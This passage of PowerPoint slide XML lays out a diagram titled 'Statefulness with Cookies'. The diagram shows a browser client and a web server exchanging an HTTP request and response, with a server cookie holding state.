            <a:off x="762000" y="76200"/>
            <a:ext cx="8531225" cy="1816100"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5900" spc="-15" dirty="0"/>
              <a:t>Statefulness </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="10" dirty="0"/>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5900" spc="10" dirty="0"/>
              <a:t>Cookies</a:t>
            </a:r>
            <a:endParaRPr sz="5900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{891B606F-8ABB-A942-80E3-749CE0F3EA9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2201863" y="2554288"/>
            <a:ext cx="1539875" cy="11445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44" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD64D7FA-3BB3-6948-B1FB-4D84D9311CBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2220913" y="2563813"/>
            <a:ext cx="1501775" cy="11049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45" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC0E89E-7399-AC40-B4F3-CBB3F24F8970}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6316663" y="2554288"/>
            <a:ext cx="1539875" cy="11445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46" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0180FF9D-4DB4-4D46-B6A6-6DCF3A3AA62D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6335713" y="2563813"/>
            <a:ext cx="1501775" cy="11049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7" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA8C9721-6593-444E-83B2-D3CD5F6608C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2565400" y="2984500"/>
            <a:ext cx="5089525" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="3967481" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Browser	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10505CB7-37E5-DE44-A9D4-B10A0046CCB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2527300" y="2095500"/>
            <a:ext cx="5054600" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="4068901" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="10" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35849" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{710C3663-7FAC-9744-B2B8-CFE4ACFF300D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4090988" y="3508375"/>
            <a:ext cx="2082800" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2081529"/>
              <a:gd name="T1" fmla="*/ 29881 w 2081529"/>
              <a:gd name="T2" fmla="*/ 2110678 w 2081529"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T3">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T4">
                <a:pos x="T1" y="0"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2081529">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="29467" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2081252"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50" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF09A2A-0D2E-1A46-854D-A81D5FCD1F44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="3390900"/>
            <a:ext cx="234950" cy="236538"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 208248 w 236220"/>
              <a:gd name="T1" fmla="*/ 0 h 236220"/>
              <a:gd name="T2" fmla="*/ 0 w 236220"/>
              <a:gd name="T3" fmla="*/ 121572 h 236220"/>
              <a:gd name="T4" fmla="*/ 208248 w 236220"/>
              <a:gd name="T5" fmla="*/ 243159 h 236220"/>
              <a:gd name="T6" fmla="*/ 208248 w 236220"/>
              <a:gd name="T7" fmla="*/ 0 h 236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220" h="236220">
                <a:moveTo>
                  <a:pt x="235737" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="117868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235737" y="235750"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2357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1" name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26ACA549-72E8-C342-B566-A05D46D80DB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810000" y="3035300"/>
            <a:ext cx="2438400" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="-85" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35852" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9A7B4A9-696F-6548-AD05-873EDCBA295E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="2979738"/>
            <a:ext cx="2081213" cy="0"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2081529"/>
              <a:gd name="T1" fmla="*/ 2044633 w 2081529"/>
              <a:gd name="T2" fmla="*/ 2073997 w 2081529"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
              <a:gd name="T4" fmla="*/ 0 60000 65536"/>
              <a:gd name="T5" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T3">
                <a:pos x="T0" y="0"/>
              </a:cxn>
              <a:cxn ang="T4">
                <a:pos x="T1" y="0"/>
              </a:cxn>
              <a:cxn ang="T5">
                <a:pos x="T2" y="0"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2081529">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2051784" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2081252"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53" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CADAACCF-6A46-E945-83B8-B275696ADB65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5937250" y="2862263"/>
            <a:ext cx="236538" cy="236537"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 236220"/>
              <a:gd name="T1" fmla="*/ 0 h 236219"/>
              <a:gd name="T2" fmla="*/ 0 w 236220"/>
              <a:gd name="T3" fmla="*/ 243145 h 236219"/>
              <a:gd name="T4" fmla="*/ 243145 w 236220"/>
              <a:gd name="T5" fmla="*/ 121572 h 236219"/>
              <a:gd name="T6" fmla="*/ 0 w 236220"/>
              <a:gd name="T7" fmla="*/ 0 h 2362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220" h="236219">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="235737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="235737" y="1178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 name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{105C2493-BE12-9645-AFD4-B498FAC43B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3937000" y="2501900"/>
            <a:ext cx="2178050" cy="404813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2600" spc="-90" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2600" spc="15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr sz="2600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35855" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AD62E3A-D25C-CE4E-BA8A-BE36FA9B077B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7997825" y="3249613"/>
            <a:ext cx="763588" cy="4810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 name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{058C998E-D9DC-434C-B270-BA94DA024917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8115300" y="3340100"/>
            <a:ext cx="517525" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>State</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35857" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1C0D05D-59D1-E44E-9C0A-C0FB8C037E8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7653338" y="2635250"/>
            <a:ext cx="1041400" cy="501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58" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{195E8D80-65D9-C449-8A9D-DBC315B18660}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7672388" y="2655888"/>
            <a:ext cx="1003300" cy="4603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59" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD74F78-7789-8C4D-A236-0E7E929CC8E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8667750" y="2954338"/>
            <a:ext cx="215900" cy="422275"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 114069 w 216534"/>
              <a:gd name="T1" fmla="*/ 436155 h 421639"/>
              <a:gd name="T2" fmla="*/ 154152 w 216534"/>
              <a:gd name="T3" fmla="*/ 380596 h 421639"/>
              <a:gd name="T4" fmla="*/ 177194 w 216534"/>
              <a:gd name="T5" fmla="*/ 337613 h 421639"/>
              <a:gd name="T6" fmla="*/ 192824 w 216534"/>
              <a:gd name="T7" fmla="*/ 296309 h 421639"/>
              <a:gd name="T8" fmla="*/ 201042 w 216534"/>
              <a:gd name="T9" fmla="*/ 256680 h 421639"/>
              <a:gd name="T10" fmla="*/ 201852 w 216534"/>
              <a:gd name="T11" fmla="*/ 218727 h 421639"/>
              <a:gd name="T12" fmla="*/ 195248 w 216534"/>
              <a:gd name="T13" fmla="*/ 182450 h 421639"/>
              <a:gd name="T14" fmla="*/ 159809 w 216534"/>
              <a:gd name="T15" fmla="*/ 114928 h 421639"/>
              <a:gd name="T16" fmla="*/ 130973 w 216534"/>
              <a:gd name="T17" fmla="*/ 83681 h 421639"/>
              <a:gd name="T18" fmla="*/ 94726 w 216534"/>
              <a:gd name="T19" fmla="*/ 54110 h 421639"/>
              <a:gd name="T20" fmla="*/ 51069 w 216534"/>
              <a:gd name="T21" fmla="*/ 26215 h 421639"/>
              <a:gd name="T22" fmla="*/ 0 w 216534"/>
              <a:gd name="T23" fmla="*/ 0 h 4216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6534" h="421639">
                <a:moveTo>
                  <a:pt x="122027" y="421297"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="164907" y="367627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189556" y="326110"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206277" y="286212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215069" y="247933"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="215934" y="211274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208870" y="176234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="170959" y="111012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="140111" y="80830"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="101335" y="52267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54632" y="25324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="2946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60" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD89535-D726-514B-B5DE-FD12585BC0A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8709025" y="3319463"/>
            <a:ext cx="136525" cy="139700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 39843 w 137159"/>
              <a:gd name="T1" fmla="*/ 0 h 138429"/>
              <a:gd name="T2" fmla="*/ 0 w 137159"/>
              <a:gd name="T3" fmla="*/ 170312 h 138429"/>
              <a:gd name="T4" fmla="*/ 123170 w 137159"/>
              <a:gd name="T5" fmla="*/ 111873 h 138429"/>
              <a:gd name="T6" fmla="*/ 39843 w 137159"/>
              <a:gd name="T7" fmla="*/ 0 h 1384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159" h="138429">
                <a:moveTo>
                  <a:pt x="44323" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="138023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137020" y="90665"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="443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5861" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A63E111-56D9-F744-A77E-DDD2A77FA76F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7650163" y="2643188"/>
            <a:ext cx="1041400" cy="500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62" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19261880-CB0C-1C4C-B714-5849C2C6C694}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7669213" y="2662238"/>
            <a:ext cx="1003300" cy="46196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63" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A37590C3-0B5B-F044-974A-3B9C10EF7973}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1166813" y="2644775"/>
            <a:ext cx="1008062" cy="5016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64" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44929A60-CAC0-3643-AA0D-79F5832329F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1185863" y="2655888"/>
            <a:ext cx="969962" cy="4603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 name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50F25867-3C31-B24E-9663-ACA33DCBAC9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1346200" y="2755900"/>
            <a:ext cx="7175500" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12676" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:tabLst>
                <a:tab pos="6477660" algn="l"/>
              </a:tabLst>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="1700" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Server	</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:endParaRPr sz="1700">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35866" name="object 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
